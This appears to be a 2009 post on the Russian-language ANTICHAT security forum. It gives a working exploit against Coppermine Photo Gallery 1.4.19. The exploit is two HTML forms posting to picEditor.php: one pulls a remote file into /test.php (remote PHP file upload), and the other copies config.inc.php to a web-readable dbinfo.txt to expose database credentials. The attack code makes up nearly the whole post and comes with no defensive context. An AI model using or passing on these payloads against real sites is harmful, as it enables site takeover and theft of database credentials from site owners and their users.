HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #13  
Старый 10.02.2009, 17:21
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Coppermine Photo gallery - Remote PHP File Upload 1.4.19

PHP код:
<?php
<html
    <
form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php" 
method=post
        <
input name="save" value=1
        <
input name="keysToSkip" value=1
        <
input name="_GET" value=1
        <
input name="_REQUEST" value=1
        <
input type=submit
    </
form
</
html


This request will copy the database connection info and make it readable here
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt 
This attack works with allow_url_fopen=Off 
<html
    <
form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt" 
method=post
        <
input name="save" value=1
        <
input name="keysToSkip" value=1
        <
input name="_GET" value=1
        <
input name="_REQUEST" value=1
        <
input type=submit
    </
form
</
html>
?>
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ